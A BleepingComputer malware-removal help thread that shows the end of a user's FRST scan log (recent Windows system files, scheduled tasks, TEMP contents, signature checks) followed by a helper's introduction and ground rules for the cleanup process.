2016-01-27 17:27 - 2015-12-30 11:02 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 01214464 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-01-27 17:27 - 2015-12-30 11:00 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-01-27 17:27 - 2015-12-30 10:59 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-01-27 17:27 - 2015-12-30 10:59 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-01-27 17:27 - 2015-12-30 10:59 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-01-27 17:27 - 2015-12-30 10:58 - 01461248 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-01-27 17:27 - 2015-12-30 10:58 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-01-27 17:27 - 2015-12-30 10:57 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-01-27 17:27 - 2015-12-30 10:57 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-01-27 17:27 - 2015-12-30 10:57 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-01-27 17:27 - 2015-12-30 10:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-01-27 17:27 - 2015-12-30 10:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-01-27 17:27 - 2015-12-30 10:55 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:47 - 03993536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-01-27 17:27 - 2015-12-30 10:47 - 03938240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-01-27 17:27 - 2015-12-30 10:44 - 01311768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-01-27 17:27 - 2015-12-30 10:40 - 00251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-01-27 17:27 - 2015-12-30 10:40 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-01-27 17:27 - 2015-12-30 10:38 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-01-27 17:27 - 2015-12-30 10:38 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:57 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-01-27 17:27 - 2015-12-30 09:50 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-01-27 17:27 - 2015-12-30 09:49 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-01-27 17:27 - 2015-12-30 09:44 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-01-27 17:27 - 2015-12-30 09:43 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-01-27 17:27 - 2015-12-30 09:42 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-01-27 17:27 - 2015-12-30 09:42 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-01-27 17:27 - 2015-12-30 09:41 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-01-27 17:27 - 2015-12-30 09:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-01-27 17:27 - 2015-12-30 09:32 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-01-27 17:27 - 2015-12-30 09:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-01-27 17:27 - 2015-12-30 09:32 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-01-27 17:27 - 2015-12-30 09:32 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-01-27 17:27 - 2015-12-30 09:30 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-01-27 17:05 - 2016-01-27 18:06 - 00000000 ____D C:\d3e963c4f282e451103dfd00
2016-01-19 00:20 - 2015-10-08 15:22 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2016-01-19 00:20 - 2015-10-08 15:18 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2016-01-19 00:20 - 2015-10-08 15:18 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2016-01-19 00:20 - 2015-10-08 15:17 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2016-01-19 00:20 - 2015-10-08 11:13 - 00419928 _____ C:\Windows\SysWOW64\locale.nls
2016-01-19 00:20 - 2015-10-08 10:52 - 00419928 _____ C:\Windows\system32\locale.nls
2016-01-13 03:51 - 2016-01-27 18:47 - 00000000 ____D C:\Users\Owner\.oracle_jre_usage
2016-01-13 03:51 - 2016-01-13 03:51 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Sun
2016-01-13 03:44 - 2016-01-13 03:44 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Oracle
2016-01-13 03:01 - 2016-01-13 03:01 - 00386096 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-01-13 03:00 - 2016-01-13 03:00 - 00043112 _____ (AVAST Software) C:\Windows\avastSS.scr
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-03 00:57 - 2011-05-24 00:26 - 00000000 ____D C:\Users\Owner\AppData\Roaming\uTorrent
2016-02-03 00:57 - 2009-07-13 20:45 - 00022464 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-02-03 00:57 - 2009-07-13 20:45 - 00022464 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-02-03 00:56 - 2014-05-30 01:39 - 00000000 ____D C:\FRST
2016-02-03 00:30 - 2011-03-19 06:35 - 00003878 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000UA
2016-02-03 00:30 - 2011-03-19 06:35 - 00003482 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000Core
2016-02-03 00:30 - 2011-03-19 06:35 - 00000908 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000UA.job
2016-02-03 00:30 - 2011-03-19 06:35 - 00000856 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000Core.job
2016-02-03 00:30 - 2009-07-13 21:13 - 00783464 _____ C:\Windows\system32\PerfStringBackup.INI
2016-02-03 00:30 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\inf
2016-02-03 00:27 - 2013-04-26 11:22 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-02-03 00:26 - 2011-02-22 03:11 - 00000000 ____D C:\Users\Owner\AppData\Local\SoftThinks
2016-02-03 00:23 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-02 03:15 - 2011-03-19 03:59 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-02 03:08 - 2014-06-19 14:46 - 00004182 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-02-02 03:04 - 2009-07-13 21:08 - 00032590 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-02-01 22:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\rescache
2016-02-01 04:06 - 2011-02-22 03:12 - 00058408 _____ C:\Users\Owner\AppData\Local\GDIPFONTCACHEV1.DAT
2016-02-01 03:58 - 2011-03-21 18:17 - 00000000 ____D C:\Users\Owner\AppData\Roaming\SoftGrid Client
2016-01-31 21:08 - 2014-06-16 13:23 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2016-01-31 20:42 - 2009-07-13 20:45 - 00269128 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-31 20:41 - 2013-03-12 23:02 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-01-31 20:41 - 2013-03-12 23:02 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-31 20:36 - 2014-12-14 14:38 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-31 20:36 - 2014-05-06 02:02 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-01-31 20:19 - 2011-03-21 18:17 - 00000000 ____D C:\Users\Owner\AppData\Local\SoftGrid Client
2016-01-31 20:13 - 2013-03-12 23:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-27 21:23 - 2011-02-22 12:01 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-01-27 21:06 - 2014-08-13 22:14 - 00000000 ____D C:\Users\Owner\Documents\WSOP.com
2016-01-27 18:46 - 2015-01-06 20:16 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-01-27 18:46 - 2015-01-06 20:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-27 18:44 - 2011-01-17 01:58 - 00000000 ____D C:\Program Files (x86)\Java
2016-01-27 18:42 - 2013-04-26 11:22 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-27 18:41 - 2013-04-26 11:22 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-27 18:41 - 2013-04-26 11:22 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-27 18:24 - 2015-01-06 20:16 - 00278624 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2016-01-27 17:05 - 2014-06-19 14:45 - 00464256 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2016-01-27 17:03 - 2014-06-19 14:45 - 01065208 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2016-01-14 11:20 - 2011-03-19 03:59 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-01-14 11:20 - 2011-03-19 03:59 - 00000000 ____D C:\ProgramData\Skype
2016-01-13 03:51 - 2011-02-22 03:11 - 00000000 ____D C:\Users\Owner
2016-01-13 03:44 - 2014-05-08 05:19 - 00000000 ____D C:\Users\Owner\AppData\Local\CrashDumps
2016-01-13 03:24 - 2014-12-28 18:08 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-01-13 03:11 - 2015-10-01 19:24 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\uTorrent
2016-01-13 03:03 - 2014-06-19 14:45 - 00097648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00273784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00155304 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00093528 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00065224 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00028656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-01-13 02:39 - 2015-04-05 16:56 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-01-13 02:39 - 2015-04-05 16:56 - 00000000 ___SD C:\Windows\system32\GWX
 
==================== Files in the root of some directories =======
 
2011-03-25 21:52 - 2014-04-25 06:40 - 0087552 _____ () C:\Users\Owner\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-03-10 23:35 - 2015-03-10 23:35 - 0007605 _____ () C:\Users\Owner\AppData\Local\Resmon.ResmonCfg
2015-06-05 15:10 - 2015-06-05 15:10 - 0000000 _____ () C:\Users\Owner\AppData\Local\{DE022639-9356-4826-8C5A-6A75C651AB81}
2014-03-11 17:32 - 2014-03-11 17:32 - 0000057 _____ () C:\ProgramData\Ament.ini
2011-03-19 04:00 - 2011-03-19 04:00 - 0000056 _____ () C:\ProgramData\ezsidmv.dat
 
Some files in TEMP:
====================
C:\Users\Owner\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp01taly.dll
C:\Users\Owner\AppData\Local\Temp\install_flash_player_18_active_x.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\msvcp110.dll
C:\Users\Owner\AppData\Local\Temp\msvcr110.dll
C:\Users\Owner\AppData\Local\Temp\pc-decrapifier.exe
C:\Users\Owner\AppData\Local\Temp\setup.exe
C:\Users\Owner\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Owner\AppData\Local\Temp\sqlite3.dll
C:\Users\Owner\AppData\Local\Temp\_unps.exe
C:\Users\Owner\AppData\Local\Temp\{9E487390-E3B0-4F5F-867D-1A7B7F90B39C}-46.0.2490.86_chrome_installer.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-01 22:20
 
==================== End of FRST.txt ============================

 

Attached Files



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,695 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:03 PM

Posted 03 February 2016 - 01:06 PM

Hi therrrn :)

My name is Aura and I'll be assisting you with your issue. Please give me a few hours to review your logs and prepare a first reply.

Thank you!

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,695 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:03 PM

Posted 04 February 2016 - 01:17 PM

Hi sterrrn :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
